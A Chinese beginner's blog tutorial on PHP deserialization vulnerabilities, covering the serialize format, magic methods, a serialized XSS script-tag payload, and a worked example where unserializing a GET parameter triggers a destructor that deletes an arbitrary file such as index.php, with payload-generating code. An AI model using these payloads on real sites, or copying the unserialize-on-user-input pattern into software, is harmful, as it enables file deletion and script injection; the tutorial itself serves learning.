小白初见PHP反序列化漏洞

本文详细介绍了PHP反序列化的基本概念,包括类、对象的定义与序列化过程,并深入探讨了魔术函数的特性和可能引发的安全漏洞。通过具体示例展示了如何利用魔术函数进行攻击,以及如何构造输入来实现特定操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里是一个PHP都不熟悉的小白同学,预习一下PHP反序列化

首先看下这个

在这里插入图片描述

class是声明一个类S,public模式的变量test

用new运算符来创立对象s

接着用序列化函数处理对象s

输出如下

在这里插入图片描述

    O:代表object
    1:代表对象名字长度为一个字符
    S:对象的名称
    1:代表对象里面有一个变量
    s:数据类型
    4:变量名称的长度
    test:变量名称
    s:数据类型
    7:变量值的长度
    pikachu:变量值

那么反序列化呢就是这样一个函数

   $u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");
    echo $u->test; //得到的结果为pikachu

而一般存在漏洞的原因是因为魔术函数(magic function)

对象:可以对其做事情的一些东西。一个对象有状态、行为和标识三种属性。
类:一个共享相同结构和行为的对象的集合。
每个类的定义都以关键字class开头,后面跟着类的名字。
一个类可以包含有属于自己的变量,变量(称为“属性”)以及函数(“称为方法”)。
类定义了一件事物的抽象特点。通常来说,类定义了事物的属性和它可以做到的。类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号“_”开头的,比如_construct,_destruct,_toString,_sleep,_wakeup等。这些函数在某些情况下会自动调用,比如:_construct当一个对象创建时调用(constructor);_destruct当一个对象被销毁时调用(destructor);_toString当一个对象被当作一个字符串时使用。

在这里插入图片描述
在这输入

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

就可以报错了。

不过这个倒也没有怎么利用magic function,所以我们继续来看下面的。

以下内容引用自https://blog.youkuaiyun.com/weixin_42751456/article/details/88758908

首先看看magic function的特性

<?php

class TestClass
{
    //一个变量
    public $variable = 'This is a string';
    //一个简单的方法
    public function PrintVariable()
    {
        echo $this->variable.'<br />';
    }
    //Constructor
    public function  __construct()
    {
        echo '__construct<br />';
    }
    //Destructor
    public function __destruct()
    {
        echo '__destruct<br />';
    }
    //call
    public function __toString()
    {
        return '__toString<br />';
    }
}
//创建一个对象
//__construct会被调用
$object = new TestClass();
//创建一个方法
//‘This is a string’将会被输出
$object->PrintVariable();
//对象被当作一个字符串
//toString会被调用
echo $object;
//php脚本要结束时,__destruct会被调用
?>
//test1.php

会得到这样的结果

在这里插入图片描述
而以下是13个魔术函数

__construct()

实例化对象时被调用, 当__construct和以类名为函数名的函数同时存在时,__construct将被调用,另一个不被调用。

__destruct()

当删除一个对象或对象操作终止时被调用。

__call()

对象调用某个方法, 若方法存在,则直接调用;若不存在,则会去调用__call函数。

__get()

读取一个对象的属性时,若属性存在,则直接返回属性值; 若不存在,则会调用__get函数。

__set()

设置一个对象的属性时, 若属性存在,则直接赋值; 若不存在,则会调用__set函数。

__toString()

打印一个对象的时被调用。如echo obj;或printobj;

__clone()

克隆对象时被调用。如:t=newTest();t1=clone $t;

__sleep()

serialize之前被调用。若对象比较大,想删减一点东东再序列化,可考虑一下此函数。

__wakeup()

unserialize时被调用,做些对象的初始化工作。

__isset()

检测一个对象的属性是否存在时被调用。如:isset($c->name)。

__unset()

unset一个对象的属性时被调用。如:unset($c->name)。

__set_state()

调用var_export时,被调用。用__set_state的返回值做为var_export的返回值。

__autoload()

实例化一个对象时,如果对应的类不存在,则该方法被调用。

然后这里是一个漏洞实例。

首先定义一个logfile类

<?php

class logfile
{
    //log文件名
    public $filename = 'error.log';
    //一些用于储存日志的代码
    public function logdata($text)
    {
        echo 'log data:'.$text.'<br />';
        file_put_contents($this->filename,$text,FILE_APPEND);
    }
    //destrcuctor 删除日志文件
    public function __destruct()
    {
        echo '__destruct deletes '.$this->filename.'file.<br />';
        unlink(dirname(__FILE__).'/'.$this->filename);
    }
}
?>
//test5.php

再调用这个类

<?php

include 'test5.php'
class User
{
    //类数据
    public $age = 0;
    public $name = '';
    //输出数据
    public function printdata()
    {
        echo 'User '.$this->name.' is'.$this->age.' years old.<br />';
    }
}
//重建数据
$usr = unserialize($_GET['usr_serialized']);
?>
//一个示例代码

从代码中可以看到:usr=unserialize(usr=unserialize(_GET[‘usr_serialized’]);$_GET[‘usr_serialized’]是可控的,那么我们就可以构造输入删除任意文件
构造输入删除目录下的index.php文件:

<?php
include 'test5.php';
$object = new logfile();
$object->filename = 'index.php';

echo serialize($object).'<br />';

?>
//test7.php

然后就完成了!删掉了index.php

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值